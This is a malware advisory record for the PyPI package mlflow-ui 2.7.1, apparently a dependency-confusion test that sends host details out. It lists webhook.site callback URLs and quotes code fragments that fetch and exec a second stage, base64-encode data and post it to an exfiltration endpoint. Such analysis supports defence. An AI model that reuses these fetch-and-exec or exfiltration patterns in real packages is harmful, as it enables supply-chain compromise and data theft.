VDB
GCVE-110-OSM-2026-8608
GCVE-110-OSM-2026-8608
Advisory PublishedCVSS 5.4/10
Bug bounty dependency confusion attempt. Package exfiltrates basic system information (hostname, IP, DNS) to security research infrastructure. Behaviors: data exfiltration, code execution, network activity.
DESTINATION
- custom-c2: https://webhook.site/9510ba0a-29f7-4ce6-afe7-632c92cf0f41 (primary, plaintext) in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py
- custom-c2: https://webhook.site/a9f5802b-c77e-4226-99dd-bc89d7dc8cca/s2.py (plaintext) in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py
- custom-c2: dl.min.io (plaintext) in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py
EXFIL
- OAST/Interactsh Exfiltration in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py: "webhook.site"
- Fetch and Eval/Exec in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py: "urllib.request.urlopen(STAGE2, context=ctx, timeout=8).read() exec(compile(code,..."
- OAST/Interactsh Exfiltration in pypi/mlflow-ui@2.7.1/payload_core.py: "webhook.site"
- Fetch and Eval/Exec in pypi/mlflow-ui@2.7.1/payload_core.py: "urllib.request.urlopen(STAGE2, context=ctx, timeout=8).read() exec(compile(code,..."
- Python File Upload to Remote in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py: "urllib.request.Request(EXFIL + path, data="
- Data Encoding for Exfiltration in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py: "base64.b64encode("
- Python File Upload to Remote in pypi/mlflow-ui@2.7.1/payload_core.py: "urllib.request.Request(EXFIL + path, data="
- Data Encoding for Exfiltration in pypi/mlflow-ui@2.7.1/payload_core.py: "base64.b64encode("
(+6 more)
ADDITIONAL FINDINGS
- Dynamic Code Execution in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py: "compile(code, 's2', 'exec')"
- Shell Command Execution in pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py: "subprocess.run("
PAYLOAD FILES
pypi/mlflow-ui@2.7.1/mlflow_ui/__init__.py (+ pypi/mlflow-ui@2.7.1/payload_core.py)
INDICATORS (IOCs)
- domains: mlflow.org
- emails: community@mlflow.org
- payloadFileHash: 6a4ef2b8c1b2c95ad736ac5dddc639f1be9566980abf488ce3d2f330e8ed4e0a
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | mlflow-ui | all (affected) | — |
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.